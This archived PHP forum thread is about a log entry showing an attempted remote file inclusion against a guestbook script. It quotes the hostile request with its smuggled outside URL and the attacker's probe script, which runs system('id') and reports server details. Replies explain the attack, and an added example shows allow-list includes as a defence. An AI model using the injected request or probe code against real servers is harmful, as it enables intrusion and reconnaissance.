php_dunce Posted October 11, 2008

Can any PHP person help me out here, please? I run several Flash servers and recently have noticed a strange error entry in my logs. The error is as follows:

GET /red5/guestbook/index.php%20//?include_path=http://******.com/v6id.txt??? HTTP/1.1 with response code(s) 404 2 responses

(I have hidden the actual URL.)

I have examined the .txt page this person is trying to include and it contains the following PHP code. So can someone here tell me what this is, please?

Contents of .txt page:

```php
function ConvertBytes($number)
{
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number);
    }
    if($len >= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "PPPoE<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "PPPoE was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
```

Link to comment: https://forums.phpfreaks.com/topic/128007-error-log/

Prismatic Posted October 11, 2008

Looks to me like someone tried to inject some PHP into your guestbook.

PFMaBiSmAd Posted October 11, 2008

This is attempting to inject raw PHP code into an include (or include_once/require/require_once) statement on your server and have it executed.

It does this by placing the URL of the raw PHP code onto the end of your URL, either in the hope that your script is using a GET parameter in an include() statement without validating what is being received, or because it knows that your script is using a GET parameter in an include() statement (some of the poorly written open source scripts, such as guest books, do not validate what is being received and contain this code injection exploit).

The posted code is only getting and outputting some information, probably just as a probing attempt to find servers and scripts that can be exploited. However, if your server and script allow this external raw PHP code to be executed, then the next step is to inject ANY code the hacker wishes to run on your server. This can result in your site being replaced or Trojan scripts being placed on your server that can be used for doing things like sending spam through your mail server.

For this exploit to work, in addition to the script that is putting GET parameters into include statements without validating them first, your PHP installation must have the allow_url_fopen setting ON (PHP 4) or it must have the allow_url_include setting on (PHP 5).

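The validation PFMaBiSmAd's post says vulnerable scripts lack, as an added example that is not code from the thread or from any guestbook script: the request only selects a key from a server-side allow-list, and the two php.ini settings named above are checked as a second layer. The `page` parameter, the `PAGES` map and the file paths are hypothetical, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example, not code from the thread. Page keys and paths are hypothetical.

// Pattern the post describes, for contrast only (never do this):
//   include $_GET['include_path'] . '/header.php';

// The request supplies a key; only this server-side map names a file.
const PAGES = [
    'home' => 'pages/home.php',
    'sign' => 'pages/sign.php',
    'view' => 'pages/view.php',
];

function resolve_page($requested, string $baseDir): ?string
{
    // Exact-match allow-list: URLs, "../", php:// wrappers and arrays all fail here.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // missing directory or file
    }
    // Containment check in case a mapped file is a symlink out of the tree.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

function ini_flag_on(string $name): bool
{
    // ini_get() returns "1", "", "On", ... depending on how the value was set.
    return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

// Defence in depth: warn if the settings named in the post are enabled.
foreach (['allow_url_include', 'allow_url_fopen'] as $flag) {
    if (ini_flag_on($flag)) {
        error_log("$flag is On; set it to Off in php.ini unless required");
    }
}

$page = resolve_page($_GET['page'] ?? 'home', __DIR__);
if ($page === null) {
    http_response_code(404);
    exit('Not found');
}
include $page;
```

A request like the one in the log above, with a URL as the parameter value, fails the allow-list lookup and gets a 404 without any include being attempted.
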
php_dunce (Author) Posted October 11, 2008

Thanks guys, I suspected it was. No, I don't have the allow_url_fopen setting ON, and I have blocked the IP address concerned.

waynew Posted October 11, 2008

echo "PPPoE<br>";

When I meet this haxor, I'm going to scold him for not using valid XHTML.

Archived
This topic is now archived and is closed to further replies.